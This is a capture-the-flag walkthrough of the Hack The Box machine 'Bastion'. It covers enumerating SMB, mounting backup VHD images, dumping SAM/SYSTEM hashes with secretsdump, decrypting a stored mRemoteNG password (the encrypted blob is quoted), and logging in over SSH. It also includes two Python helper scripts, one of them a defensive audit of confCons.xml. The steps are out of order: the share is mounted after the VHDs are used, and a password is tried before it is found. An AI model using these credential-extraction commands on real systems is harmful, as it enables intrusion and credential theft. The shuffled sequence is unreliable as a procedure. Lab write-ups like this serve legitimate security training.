Hackthebox - Bastion
Windows
While investigating SMB we can launch gobuster scans on the open HTTP ports:
gobuster dir -u http://10.10.10.134:47001/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
gobuster dir -u http://10.10.10.134:5985/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Nothing here (the foothold really seems to go through SMB).
Looking at the nmap output, SMB seems worth investigating.
We are finally able to connect to a share this way:
Let's get the content. We can fetch everything in one go using this set of commands:
We have to abort this; the note says:
Big hint to investigate this backup folder
Let's just have a look around for now
Here is an article by Jake Binstein that helps to better understand the folder (check out the Structure part at the end). That is a start.
We have some information: the name of the PC and a potential user, L4mpje-PC.
Looking further in the files we find VHD images. Here is an article by Samuel Whang on how to mount this type of file.
Following Samuel Whang's article, we first create a directory to mount the remote share: sudo mkdir /mnt/remote
Note: I am going to sudo su for the rest of the process
Let's create a mount point for the first vhd file: mkdir /mnt/vhd1
Let's now mount it with guestmount: guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd1 -v
Let's do the same for the 2nd vhd file:
mkdir /mnt/vhd2
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -v
In my case it worked for the 2nd file only. I am going to inspect it and then troubleshoot the 1st file if needed (note: I realized later that one is a boot partition and the other the disk, which is why one of the images is useless for us).
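The mounting steps above boil down to a small procedure: walk the WindowsImageBackup tree, locate the .vhd images of each backup set, and mount the large OS volume rather than the tiny boot partition. The following Python script is an added example (not part of the original writeup nor of the articles it cites); it assumes the "Backup YYYY-MM-DD HHMMSS" directory naming seen on the share, builds a constructed sample tree so it runs offline, and only prints the guestmount command rather than executing it.

```python
import os
import re
import shlex
import tempfile
from datetime import datetime

# Backup-set directories in a WindowsImageBackup tree are named "Backup YYYY-MM-DD HHMMSS"
# (assumed from the share listing in the writeup, e.g. "Backup 2019-02-22 124351").
BACKUP_DIR_RE = re.compile(r"^Backup (\d{4}-\d{2}-\d{2}) (\d{6})$")


def find_backup_vhds(root):
    """Walk <root>/<machine>/<Backup ...>/ and describe every .vhd/.vhdx image found."""
    found = []
    for machine in sorted(os.listdir(root)):
        machine_dir = os.path.join(root, machine)
        if not os.path.isdir(machine_dir):
            continue
        for entry in sorted(os.listdir(machine_dir)):
            m = BACKUP_DIR_RE.match(entry)
            backup_dir = os.path.join(machine_dir, entry)
            if not m or not os.path.isdir(backup_dir):
                continue
            taken = datetime.strptime(m.group(1) + m.group(2), "%Y-%m-%d%H%M%S")
            for name in sorted(os.listdir(backup_dir)):
                if name.lower().endswith((".vhd", ".vhdx")):
                    path = os.path.join(backup_dir, name)
                    found.append({"machine": machine, "taken": taken,
                                  "path": path, "size": os.path.getsize(path)})
    return found


def pick_system_volume(vhds):
    """Largest image of the newest backup set: the OS volume, not the small boot partition."""
    if not vhds:
        return None
    newest = max(v["taken"] for v in vhds)
    return max((v for v in vhds if v["taken"] == newest), key=lambda v: v["size"])


def guestmount_command(vhd_path, mountpoint):
    """Read-only guestmount invocation as used in the writeup, quoted for the shell."""
    return "guestmount --add {} --inspector --ro {}".format(
        shlex.quote(vhd_path), shlex.quote(mountpoint))


def build_sample_tree():
    """Constructed stand-in for the share: a tiny boot partition and a larger OS volume image."""
    root = tempfile.mkdtemp(prefix="WindowsImageBackup-")
    backup = os.path.join(root, "L4mpje-PC", "Backup 2019-02-22 124351")
    os.makedirs(backup)
    os.makedirs(os.path.join(root, "L4mpje-PC", "Catalog"))  # non-backup dir, must be skipped
    with open(os.path.join(backup, "9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd"), "wb") as f:
        f.write(b"\0" * 512)   # boot partition stand-in
    with open(os.path.join(backup, "9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"), "wb") as f:
        f.write(b"\0" * 4096)  # OS volume stand-in
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    images = find_backup_vhds(root)
    for img in images:
        print(f"{img['machine']}  {img['taken']:%Y-%m-%d %H:%M:%S}  {img['size']:>12} B  {img['path']}")
    best = pick_system_volume(images)
    if best:
        print("\nMount first:", guestmount_command(best["path"], "/mnt/vhd1"))
```

Run it with the mounted share as argument (python3 script.py /mnt/remote/WindowsImageBackup) to list the images with their sizes; the size ranking is what tells the OS volume apart from the boot partition before spending time on a mount that yields nothing.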
Let's copy the SAM, SECURITY and SYSTEM files into my working directory: cp SAM SECURITY SYSTEM ../../../../../home/kali/Documents/hackthebox/bastion
Let's try the password on ssh.
Also we can note that, according to the admin hash, the password is not stored as an LM hash (the LM field is the blank/null value).
Let's get winPEAS onto the target. Nothing really.
PowerUp is more verbose. It seems to point at a DLL hijack.
I tried the techniques listed here, however with our current rights nothing works...
Let's go back to manual enum
Among the installed programs this one is unusual: mRemoteNG. We can have a look at the changelog to get the version, which seems to be 1.76.11.
After a google search we get this article. It turns out this article used this very same box as an example... it is a big spoiler xD. But in a real context we would have looked in the configuration files anyway and googled something like "decrypt mremoteng passwords" or similar.
Indeed the file confCons.xml contains a password.
We can follow step 3 of the article: python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
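The underlying weakness is that confCons.xml keeps saved passwords as blobs protected only by mRemoteNG's master password, so anyone who can read the file can recover them whenever the default master password is in use. As an added example (not from the writeup or from mRemoteNG itself), the script below audits a confCons.xml the way a defender would: it lists which connections carry a saved credential and how the file is protected. The XML layout and attribute names (EncryptionEngine, BlockCipherMode, KdfIterations, FullFileEncryption, Node/Password) are assumed from the 1.7x format, the sample file is constructed, and the blobs are placeholders rather than the value shown above.

```python
import xml.etree.ElementTree as ET

# Constructed minimal confCons.xml in the mRemoteNG 1.7x layout. Attribute names are assumed
# from that format; the blobs are placeholders, not the value shown in the writeup.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER-PROTECTED-BLOB" ConfVersion="2.6">
  <Node Name="Servers" Type="Container" Username="" Password="" Hostname="" Protocol="RDP">
    <Node Name="DC01" Type="Connection" Username="Administrator" Domain="CORP"
          Password="PLACEHOLDER-ENCRYPTED-BLOB" Hostname="192.0.2.10" Protocol="RDP" Port="3389" />
    <Node Name="Jump" Type="Connection" Username="L4mpje" Domain=""
          Password="" Hostname="192.0.2.11" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text):
    """Return which connections carry a saved credential and how the file is protected."""
    root = ET.fromstring(xml_text)
    report = {
        "full_file_encryption": (root.get("FullFileEncryption") or "false").lower() == "true",
        "kdf_iterations": int(root.get("KdfIterations") or 0),
        "cipher": "{}/{}".format(root.get("EncryptionEngine"), root.get("BlockCipherMode")),
        "connections": [],
    }
    for node in root.iter("Node"):  # Node elements are unprefixed; iter() descends into containers
        if node.get("Type") != "Connection":
            continue  # containers only group nodes; their own Password attribute is irrelevant
        report["connections"].append({
            "name": node.get("Name"),
            "host": node.get("Hostname"),
            "protocol": node.get("Protocol"),
            "username": node.get("Username") or "",
            "stored_password": bool(node.get("Password")),
        })
    return report


def findings(report):
    """Plain-language findings a reviewer would raise from the report."""
    out = []
    stored = [c for c in report["connections"] if c["stored_password"]]
    for c in stored:
        out.append("{name} ({protocol} {host}): saved password for '{username}'".format(**c))
    if stored and not report["full_file_encryption"]:
        out.append("file is readable XML; saved passwords are only as safe as the master password "
                   "(if the default one is in use, anyone who can read this file can decrypt them)")
    if report["kdf_iterations"] and report["kdf_iterations"] < 10000:  # 10000 is this script's own threshold
        out.append("KdfIterations={} is low for a password-derived key".format(report["kdf_iterations"]))
    return out


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CONFCONS
    for line in findings(audit_confcons(text)):
        print("-", line)
```

Pointed at a real file (python3 audit.py confCons.xml), the output is the list of hosts and accounts whose password would fall with the file, which is exactly the inventory to hand to whoever has to rotate them after a share like this one turns out to be world-readable.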
We can mount the share: sudo mount -t cifs //10.10.10.134/Backups /mnt/remote -o rw
It works.
We navigate where we have the vhd files
We can use secretsdump on them and we get... secrets: python3 /opt/impacket/examples/secretsdump.py local -sam SAM -security SECURITY -system SYSTEM
Let's try the password we just found on SSH: ssh L4mpje@10.10.10.134
It works, we have a user shell.
We can grab the user flag
We get the password
We can use it to connect in ssh and grab the root flag